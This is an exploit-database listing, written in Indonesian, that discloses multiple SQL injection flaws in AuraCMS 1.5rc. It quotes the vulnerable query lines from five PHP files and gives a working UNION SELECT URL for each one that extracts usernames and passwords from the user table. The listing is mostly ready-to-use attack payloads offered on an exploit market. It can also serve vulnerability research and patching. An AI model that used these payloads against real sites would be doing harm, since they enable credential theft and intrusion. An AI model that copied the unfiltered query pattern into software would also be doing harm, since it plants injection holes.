[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities

Author
k1tk4t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2124
Category
web applications
Date add
08-09-2007
Platform
unsorted
===========================================================
AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities
===========================================================



########################################################################
# AuraCMS version 1.5rc - Multiple Remote SQL Injection Vulnerabilities
# Vendor           : http://www.auracms.org/
# Ditemukan oleh   : k1tk4t 
# Lokasi           : Indonesia  
########################################################################

// Kutu pada berkas 'hal.php' baris-7
$perintah="SELECT * FROM halaman WHERE id=$id";
$hasil = mysql_query( $perintah );
--> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser
Contoh;
http://localhost/auracms15/?pilih=hal&id=-9%20UNION%20SELECT%200,user,password%20from%20user/*


// Kutu pada berkas 'cetak.php' baris-7
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
--> $id tidak ter'filter'sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser
Contoh;
http://localhost/auracms15/cetak.php?id=-9%20UNION%20SELECT%20null,null,null,password,null,user,null,null%20from%20user/*


// Kutu pada berkas 'lihat.php' baris-7
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser
Contoh;
http://localhost/AuraCMS1.5/?pilih=lihat&id=-9%20UNION%20SELECT%20null,user,password,null,null,null,null,null%20from%20user/*


// Kutu pada berkas 'pesan.php' baris-7
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
} else {
    $perintah="SELECT * FROM komentar WHERE id=$id";
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser
Contoh;
http://localhost/AuraCMS1.5/?pilih=pesan&id=-9%20UNION%20SELECT%20null,null,null,concat(user,0x3a,password),null,null,null,null%20from%20user/*


// Kutu pada berkas 'teman.php' baris-6
$perintah="SELECT * FROM artikel WHERE id=$id AND publikasi=1";
$hasil = mysql_query( $perintah );
--> $id tidak ter'filter' sebelumnya dengan baik, sehingga pengguna dapat memanipulasi SQL melalui browser
Contoh;
http://localhost/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*


########################################################################

!!! Mohon maaf untuk webadmin mohon di update ke AuraCMS versi terbaru !!!  

########################################################################
Terimakasih untuk;
str0ke, DNX
xoron,iFX,x-ace,nyubi,arioo,selikoer,k1ngk0ng,aldy_BT,adhietslank
dan semua temen2 komunitas security&hacking


#  0day.today [2024-07-05]  #